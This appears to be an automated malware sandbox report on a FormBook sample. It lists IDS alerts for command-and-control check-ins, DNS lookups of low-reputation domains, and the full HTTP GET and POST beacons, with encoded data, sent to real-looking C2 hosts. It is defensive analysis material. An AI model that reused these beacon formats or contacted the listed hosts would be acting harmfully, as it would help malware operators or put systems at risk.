Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49979 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50012 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 103.23.149.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50017 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50019 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50025 -> 3.33.130.190:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.furrcali.xyz
Source:	DNS query: www.letsbookcruise.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004DCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_004DCE44

Source: global traffic	HTTP traffic detected: GET /kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P HTTP/1.1Host: www.champs-cloud.systemsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /danh/?SDC=plfeFctMvM5qFTk9zYraEzuSV04Dajmg5T2jzUK/AFUa2umQn4AZ92ZqS+0pXSD/w+7u0pkwA/lc4M7GNy4MLzjoWeEcf8xh8tT7C8tCLIno1r1qjw==&mH=CpePy0P HTTP/1.1Host: www.tabo.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P HTTP/1.1Host: www.ripbgs.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGBzI/s6vr0u70Fx+osGIx3CSKkpUtFBkz/SLftrHWbhIk1Rz+XVgaXqtFhG2oma8AA== HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /8ipa/?mH=CpePy0P&SDC=NWRXiVj8AMb+XbLG30cHZ8dR/qgEm1X2FzW3Fi5JWafAVcEgASASZtNzkCKKItj93NUCc/pzvW2js9miz8JvOxL+x7FDFMxI/5vVjfiDizU1pDvz1w== HTTP/1.1Host: www.y6h6kn.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /c69p/?mH=CpePy0P&SDC=jyK5HE7NUJLGVnbkf7QwVicaXg1q4q7wP25RVqGmoZpihph1vtV/87z4vRkTuhYSkBvsM7Lb6tufU3t2WqEWtFDtCNi7ZVC1CswAFEfe3o0h1mFb0A== HTTP/1.1Host: www.digitalpath.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /yjjd/?SDC=MWNjLlRwXekue+QzVuys4xl2S9wrceSWxW9TUDuiZq768glRmLRQ5DrcZ+2LxVrk3Fm2ehcXeXOAVGFzhdK4ff29jHlX+n9HZzQZjI7+FRlLo7a74Q==&mH=CpePy0P HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P HTTP/1.1Host: www.londonatnight.coffeeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kbfm/?SDC=Et3k4bdkHTaBSJAD+wWT8rM2olXJoeWF+cxPd+han41yLeLBYYxv+G2j6PtMFGmyeyrg8tSufO7cfo6aybBH4l4Erf9TSM3qsmv+bYmxao8hYYxwGw==&mH=CpePy0P HTTP/1.1Host: www.letsbookcruise.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kbfm/?SDC=Et3k4bdkHTaBSJAD+wWT8rM2olXJoeWF+cxPd+han41yLeLBYYxv+G2j6PtMFGmyeyrg8tSufO7cfo6aybBH4l4Erf9TSM3qsmv+bYmxao8hYYxwGw==&mH=CpePy0P HTTP/1.1Host: www.letsbookcruise.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P HTTP/1.1Host: www.erexolsk.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P HTTP/1.1Host: www.cifasnc.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P HTTP/1.1Host: www.champs-cloud.systemsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.champs-cloud.systems
Source: global traffic	DNS traffic detected: DNS query: www.samehadaku.red
Source: global traffic	DNS traffic detected: DNS query: www.tabo.group
Source: global traffic	DNS traffic detected: DNS query: www.ripbgs.info
Source: global traffic	DNS traffic detected: DNS query: www.furrcali.xyz
Source: global traffic	DNS traffic detected: DNS query: www.smartbath.shop
Source: global traffic	DNS traffic detected: DNS query: www.y6h6kn.top
Source: global traffic	DNS traffic detected: DNS query: www.bellhomehd.shop
Source: global traffic	DNS traffic detected: DNS query: www.digitalpath.website
Source: global traffic	DNS traffic detected: DNS query: www.bonheur.tech
Source: global traffic	DNS traffic detected: DNS query: www.londonatnight.coffee
Source: global traffic	DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic	DNS traffic detected: DNS query: www.letsbookcruise.xyz
Source: global traffic	DNS traffic detected: DNS query: www.erexolsk.shop
Source: global traffic	DNS traffic detected: DNS query: www.cifasnc.info

Source: unknown

HTTP traffic detected: POST /danh/ HTTP/1.1Host: www.tabo.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.tabo.groupContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 192Connection: closeReferer: http://www.tabo.group/danh/User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 53 44 43 3d 6b 6e 33 2b 47 74 77 4d 6c 2f 39 4f 55 41 42 2f 30 5a 53 74 61 56 4f 43 57 33 64 33 66 78 53 5a 34 30 61 4e 76 56 4f 57 43 77 6b 6d 2f 5a 61 4a 2f 37 59 65 2b 47 56 4e 5a 76 51 34 55 44 50 6b 67 71 76 41 36 71 4d 74 63 39 49 64 34 74 2f 35 4b 33 77 42 57 69 76 4a 58 66 74 41 57 64 67 66 70 70 62 41 5a 37 49 51 41 36 54 33 7a 73 56 61 38 54 64 6d 6c 30 77 7a 7a 54 37 6a 7a 77 4e 35 6c 37 6e 35 4f 6a 36 72 59 64 4d 71 4b 33 6f 55 7a 64 69 4e 6f 35 62 5a 36 52 74 53 71 4c 78 78 72 69 35 65 67 49 61 4f 72 77 5a 6a 45 78 47 47 52 4f 58 45 44 73 39 61 4d 6e 5a 4c Data Ascii: SDC=kn3+GtwMl/9OUAB/0ZStaVOCW3d3fxSZ40aNvVOWCwkm/ZaJ/7Ye+GVNZvQ4UDPkgqvA6qMtc9Id4t/5K3wBWivJXftAWdgfppbAZ7IQA6T3zsVa8Tdml0wzzT7jzwN5l7n5Oj6rYdMqK3oUzdiNo5bZ6RtSqLxxri5egIaOrwZjExGGROXEDs9aMnZL

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:14:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:14:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:14:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:14:37 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:14:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:14:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:14:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:14:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 17:15:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T17:16:02.9054501Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 17:16:11 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T17:16:16.3272890Z
